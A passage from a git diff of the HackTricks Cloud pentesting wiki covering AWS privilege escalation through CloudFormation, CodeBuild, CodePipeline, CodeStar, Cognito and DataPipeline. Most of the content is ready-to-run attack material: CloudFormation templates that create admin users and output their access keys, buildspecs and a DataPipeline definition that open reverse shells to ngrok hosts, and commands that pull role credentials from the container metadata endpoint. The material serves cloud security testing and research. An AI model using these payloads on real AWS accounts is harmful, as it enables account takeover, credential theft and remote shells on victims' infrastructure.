arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ --capabilities CAPABILITY_IAM \ - --region eu-west-1 + --region eu-west-1 ``` The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. @@ -126,19 +113,6 @@ An attacker could abuse this permission without the passRole permission to updat ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md new file mode 100644 index 000000000..47f709078 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md @@ -0,0 +1,81 @@ +# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks + +{{#include ../../../../banners/hacktricks-training.md}} + +An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: + +```json +{ + "Resources": { + "AdminUser": { + "Type": "AWS::IAM::User" + }, + "AdminPolicy": { + "Type": "AWS::IAM::ManagedPolicy", + "Properties": { + "Description": "This policy allows all actions on all resources.", + "PolicyDocument": { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": ["*"], + "Resource": "*" + } + ] + }, + "Users": [ + { + "Ref": "AdminUser" + } + ] + } + }, + "MyUserKeys": { + "Type": "AWS::IAM::AccessKey", + "Properties": { + "UserName": { + "Ref": "AdminUser" + } + } + } + }, + "Outputs": { + "AccessKey": { + "Value": { + "Ref": "MyUserKeys" + }, + "Description": "Access Key ID of Admin User" + }, + "SecretKey": { + "Value": { + "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"] + }, + "Description": "Secret Key of Admin User" + } + } +} +``` + +Then **generate the cloudformation stack**: + +```bash +aws cloudformation create-stack --stack-name privesc \ + --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ + --role arn:aws:iam::[REDACTED]:role/adminaccess \ + --capabilities CAPABILITY_IAM --region us-west-2 +``` + +**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: + +```bash +aws cloudformation describe-stacks \ + --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ + --region uswest-2 +``` + +### References + +- [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md similarity index 70% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index 043bba875..b84aa8b1f 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -1,35 +1,22 @@ # AWS - Codebuild Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## codebuild Get more info in: -{% content-ref url="../aws-services/aws-codebuild-enum.md" %} -[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-codebuild-enum.md +{{#endref}} ### `codebuild:StartBuild` | `codebuild:StartBuildBatch` Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: -{% tabs %} -{% tab title="StartBuild" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="StartBuild" }} + ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` -{% endcode %} -{% endtab %} -{% tab title="StartBuildBatch" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="StartBuildBatch" }} + ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Note**: The difference between these two commands is that: -* `StartBuild` triggers a single build job using a specific `buildspec.yml`. -* `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). +- `StartBuild` triggers a single build job using a specific `buildspec.yml`. +- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). **Potential Impact:** Direct privesc to attached AWS Codebuild roles. @@ -86,8 +73,9 @@ aws codebuild start-build-batch --project --buildspec-override fi An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one. -{% tabs %} -{% tab title="Example1" %} +{{#tabs }} +{{#tab name="Example1" }} + ```bash # Enumerate then env and get creds REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" @@ -129,10 +117,11 @@ aws codebuild start-build --project-name codebuild-demo-project # Delete the project aws codebuild delete-project --name codebuild-demo-project ``` -{% endtab %} -{% tab title="Example2" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="Example2" }} + ```bash # Generated by AI, not tested # Create a buildspec.yml file with reverse shell command @@ -152,21 +141,20 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat aws codebuild start-build --project-name reverse-shell-project ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Direct privesc to any AWS Codebuild role. -{% hint style="warning" %} -In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**. +> [!WARNING] +> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**. -This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` +> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` -Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials. +> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials. -Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**. -{% endhint %} +> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**. ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) @@ -212,9 +200,9 @@ aws codebuild start-build --project-name codebuild-demo-project Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**. -{% tabs %} -{% tab title="StartBuild" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="StartBuild" }} + ```sh REV_PATH="/tmp/codebuild_pwn.json" @@ -249,11 +237,11 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` -{% endcode %} -{% endtab %} -{% tab title="StartBuildBatch" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="StartBuildBatch" }} + ```sh REV_PATH="/tmp/codebuild_pwn.json" @@ -286,9 +274,9 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build-batch --project-name codebuild-demo-project ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Direct privesc to attached AWS Codebuild roles. @@ -324,7 +312,7 @@ Note: the escalation is relevant only if the CodeBuild worker has a different ro ```bash aws s3 cp s3:///buildspec.yml ./ -vim ./buildspec.yml +vim ./buildspec.yml # Add the following lines in the "phases > pre_builds > commands" section # @@ -340,8 +328,7 @@ aws codebuild start-build --project-name You can use something like this **buildspec** to get a **reverse shell**: -{% code title="buildspec.yml" %} -```yaml +```yaml:buildspec.yml version: 0.2 phases: @@ -349,29 +336,14 @@ phases: commands: - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 ``` -{% endcode %} **Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges. -{% hint style="warning" %} -Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload -{% endhint %} +> [!WARNING] +> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). **Potential Impact:** Direct privesc to attached AWS Codebuild roles. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md new file mode 100644 index 000000000..884bb7fa3 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md @@ -0,0 +1,37 @@ +# AWS - Codepipeline Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## codepipeline + +For more info about codepipeline check: + +{{#ref}} +../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +{{#endref}} + +### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` + +When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. + +Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) + +I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` + +During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: + +![](<../../../images/image (276).png>) + +![](<../../../images/image (181).png>) + +### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` + +It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. + +### `codepipeline:pollforjobs` + +[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): + +> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md new file mode 100644 index 000000000..9dd00b43d --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md @@ -0,0 +1,73 @@ +# AWS - Codestar Privesc + +{{#include ../../../../banners/hacktricks-training.md}} + +## Codestar + +You can find more information about codestar in: + +{{#ref}} +codestar-createproject-codestar-associateteammember.md +{{#endref}} + +### `iam:PassRole`, `codestar:CreateProject` + +With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: + +{{#ref}} +iam-passrole-codestar-createproject.md +{{#endref}} + +### `codestar:CreateProject`, `codestar:AssociateTeamMember` + +This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. + +```bash +PROJECT_NAME="supercodestar" + +aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ + --name $PROJECT_NAME \ + --id $PROJECT_NAME + +echo "Waiting 1min to start the project" +sleep 60 + +USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') + +aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ + --project-id $PROJECT_NAME \ + --user-arn "$USER_ARN" \ + --project-role "Owner" \ + --remote-access-allowed +``` + +If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` + +**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in: + +{{#ref}} +codestar-createproject-codestar-associateteammember.md +{{#endref}} + +### `codestar:CreateProjectFromTemplate` + +1. **Create a New Project:** + - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. + - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. + - This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. +2. **Update the Target Stack:** + - With the granted CloudFormation permissions, proceed to update the specified stack. + - The stack's name will typically conform to one of two patterns: + - `awscodestar--infrastructure` + - `awscodestar--lambda` + - The exact name depends on the chosen template (referencing the example exploit script). +3. **Access and Permissions:** + - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. + - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. + +For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ +You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) + +**Potential Impact:** Privesc to cloudformation IAM role. + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md new file mode 100644 index 000000000..7f900c00f --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md @@ -0,0 +1,81 @@ +# codestar:CreateProject, codestar:AssociateTeamMember + +{{#include ../../../../banners/hacktricks-training.md}} + +This is the created policy the user can privesc to (the project name was `supercodestar`): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "1", + "Effect": "Allow", + "Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"], + "Resource": [ + "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", + "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", + "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" + ] + }, + { + "Sid": "2", + "Effect": "Allow", + "Action": [ + "codestar:DescribeUserProfile", + "codestar:ListProjects", + "codestar:ListUserProfiles", + "codestar:VerifyServiceRole", + "cloud9:DescribeEnvironment*", + "cloud9:ValidateEnvironmentName", + "cloudwatch:DescribeAlarms", + "cloudwatch:GetMetricStatistics", + "cloudwatch:ListMetrics", + "codedeploy:BatchGet*", + "codedeploy:List*", + "codestar-connections:UseConnection", + "ec2:DescribeInstanceTypeOfferings", + "ec2:DescribeInternetGateways", + "ec2:DescribeNatGateways", + "ec2:DescribeRouteTables", + "ec2:DescribeSecurityGroups", + "ec2:DescribeSubnets", + "ec2:DescribeVpcs", + "events:ListRuleNamesByTarget", + "iam:GetAccountSummary", + "iam:GetUser", + "iam:ListAccountAliases", + "iam:ListRoles", + "iam:ListUsers", + "lambda:List*", + "sns:List*" + ], + "Resource": ["*"] + }, + { + "Sid": "3", + "Effect": "Allow", + "Action": [ + "codestar:*UserProfile", + "iam:GenerateCredentialReport", + "iam:GenerateServiceLastAccessedDetails", + "iam:CreateAccessKey", + "iam:UpdateAccessKey", + "iam:DeleteAccessKey", + "iam:UpdateSSHPublicKey", + "iam:UploadSSHPublicKey", + "iam:DeleteSSHPublicKey", + "iam:CreateServiceSpecificCredential", + "iam:UpdateServiceSpecificCredential", + "iam:DeleteServiceSpecificCredential", + "iam:ResetServiceSpecificCredential", + "iam:Get*", + "iam:List*" + ], + "Resource": ["arn:aws:iam::947247140022:user/${aws:username}"] + } + ] +} +``` + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md new file mode 100644 index 000000000..ab8af00d1 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md @@ -0,0 +1,88 @@ +# iam:PassRole, codestar:CreateProject + +{{#include ../../../../banners/hacktricks-training.md}} + +With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. + +To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: + +```json:toolchain.json +{ + "Resources": { + "supercodestar": { + "Type": "AWS::IAM::ManagedPolicy", + "Properties": { + "ManagedPolicyName": "CodeStar_supercodestar", + "PolicyDocument": { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "*", + "Resource": "*" + } + ] + }, + "Users": [""] + } + } + } +} +``` + +Also **upload** this `empty zip` file to the **bucket**: + +{% file src="../../../../images/empty.zip" %} + +Remember that the **bucket with both files must be accessible by the victim account**. + +With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: + +```bash +PROJECT_NAME="supercodestar" + +# Crecte the source JSON +## In this JSON the bucket and key (path) to the empry.zip file is used +SOURCE_CODE_PATH="/tmp/surce_code.json" +SOURCE_CODE="[ + { + \"source\": { + \"s3\": { + \"bucketName\": \"privesc\", + \"bucketKey\": \"empty.zip\" + } + }, + \"destination\": { + \"codeCommit\": { + \"name\": \"$PROJECT_NAME\" + } + } + } +]" +printf "$SOURCE_CODE" > $SOURCE_CODE_PATH + +# Create the toolchain JSON +## In this JSON the bucket and key (path) to the toolchain.json file is used +TOOLCHAIN_PATH="/tmp/tool_chain.json" +TOOLCHAIN="{ + \"source\": { + \"s3\": { + \"bucketName\": \"privesc\", + \"bucketKey\": \"toolchain.json\" + } + }, + \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" +}" +printf "$TOOLCHAIN" > $TOOLCHAIN_PATH + +# Create the codestar project that will use the cloudformation epxloit to privesc +aws codestar create-project \ + --name $PROJECT_NAME \ + --id $PROJECT_NAME \ + --source-code file://$SOURCE_CODE_PATH \ + --toolchain file://$TOOLCHAIN_PATH +``` + +This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md similarity index 82% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md index fea511a1e..cc8d8d94f 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md @@ -1,27 +1,14 @@ # AWS - Cognito Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Cognito For more info about Cognito check: -{% content-ref url="../aws-services/aws-cognito-enum/" %} -[aws-cognito-enum](../aws-services/aws-cognito-enum/) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-cognito-enum/ +{{#endref}} ### Gathering credentials from Identity Pool @@ -107,11 +94,9 @@ aws cognito-idp admin-add-user-to-group \ An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles: -{% code overflow="wrap" %} ```bash aws cognito-idp create-group --group-name Hacked --user-pool-id --role-arn ``` -{% endcode %} **Potential Impact:** Privesc to other Cognito IAM roles. @@ -156,7 +141,7 @@ aws cognito-idp admin-enable-user \ ### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`** -This permission allows to login with the [**method ADMIN\_USER\_PASSWORD\_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link. +This permission allows to login with the [**method ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link. ### `cognito-idp:AdminSetUserPassword` @@ -290,7 +275,7 @@ An attacker could also use these permissions to **enroll himself to a Cognito st ### Automatic Tools -* [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. @@ -299,8 +284,8 @@ For a description of the modules' functions see part 2 of the [blog post](https: Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: ```bash -Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools -us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` @@ -310,7 +295,7 @@ Sample cognito\_\_enum usage to gather all user pools, user pool clients, identi Pacu (new:test) > run cognito__enum ``` -* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation. +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation. #### Installation @@ -326,17 +311,4 @@ $ cognito-scanner --help For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md new file mode 100644 index 000000000..585e407d3 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md @@ -0,0 +1,74 @@ +# AWS - Datapipeline Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## datapipeline + +For more info about datapipeline check: + +{{#ref}} +../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +{{#endref}} + +### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` + +Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** + +```bash +aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string +``` + +After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: + +```json +{ + "objects": [ + { + "id": "CreateDirectory", + "type": "ShellCommandActivity", + "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", + "runsOn": { "ref": "instance" } + }, + { + "id": "Default", + "scheduleType": "ondemand", + "failureAndRerunMode": "CASCADE", + "name": "Default", + "role": "assumable_datapipeline", + "resourceRole": "assumable_datapipeline" + }, + { + "id": "instance", + "name": "instance", + "type": "Ec2Resource", + "actionOnTaskFailure": "terminate", + "actionOnResourceFailure": "retryAll", + "maximumRetries": "1", + "instanceType": "t2.micro", + "securityGroups": ["default"], + "role": "assumable_datapipeline", + "resourceRole": "assumable_ec2_profile_instance" + } + ] +} +``` + +> [!NOTE] +> Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. +> +> Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). + +```bash +aws datapipeline put-pipeline-definition --pipeline-id \ + --pipeline-definition 